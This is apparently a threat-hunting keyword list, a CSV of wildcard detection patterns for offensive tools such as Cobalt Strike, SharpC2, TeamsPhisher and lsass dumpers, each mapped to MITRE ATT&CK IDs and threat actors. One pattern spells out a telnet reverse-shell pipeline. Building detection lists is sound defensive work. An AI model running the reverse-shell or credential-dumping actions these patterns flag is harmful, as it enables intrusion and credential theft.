-*tarunkant/Gopherus*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*tas389.ps1*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*tasklist /fi *Imagename eq lsass.exe* | find *lsass*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-"*tasklist /svc | findstr /i ""vmtoolsd.exe""*",greyware_tool_keyword,tasklist,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*TaskShell.exe * -b *.exe*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z
-*TaskShell.exe * -s *SYSTEM*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z
-*tastypepperoni/PPLBlade*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z
-*tastypepperoni/RunAsWinTcb*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z
-*tcp://0.tcp.ngrok.io:*,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*tcpClient.connectTCP(*127.0.0.1*1337*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,0,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z
-*tcpdump *,greyware_tool_keyword,tcpdump,A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,http://www.tcpdump.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*tcpreplay*,offensive_tool_keyword,tcpreplay,Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.,T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://tcpreplay.appneta.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*tcpshell.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*tdragon6/Supershell*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z
-*teamserver* no_evasion.profile*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,0,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z
-*teamServer*ZoomAPI.py*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z
-*TeamServer.C2Profiles*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*TeamServer.exe *github.com*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z
-*TeamServer.prop*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z
-*TeamServer/Filters/InjectionFilters*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*TeamServer/Pivots/*.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*TeamServer\TeamServer.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*TeamsPhisher.git*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z
-*teamsphisher.log*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z
-*teamsphisher.py*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z
-*TeamsPhisher-main.zip*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z
-*teamstracker-main*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z
-*teamviewer_passwords.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*teamviewer_passwords.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*techspence/ScriptSentry*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z
-*tecknicaltom/dsniff*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well),T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z
-*Teensypreter.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z
-*telegram2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*TelegramRAT-main*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z
-*telnet * | /bin/bash | telnet *,greyware_tool_keyword,telnet,telnet reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z
-*temp*\pp.exe*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,0,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z
-*temp*KillDefender*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z
-*temp*lsass_*.dmp*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,,
-*temp*whoami.txt*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*Temp\dumpert*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z
-*temp\stager.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*templates*CSExec.cs*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,,
-*templates*HIPS_LIPS_processes.txt*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,,
-*templates*reflective_assembly_minified.ps1*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,,
-*tenable.com/downloads/nessus*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A
-*Terminating Windows Defender?*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z
-*test.endpoint.rapid7.com*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.rapid7.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*test_beef_debugs_spec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*test_ccache_fromKirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*test_crawler.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-*test_invoke_bof.x64.o*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z
-*test_litefuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z
-*test_lsassy.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z
-*test_mitm_initialization.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z
-*test_nanodump_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*test_pacu_update.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*test_tezos2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*TestConsoleApp_YSONET*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z
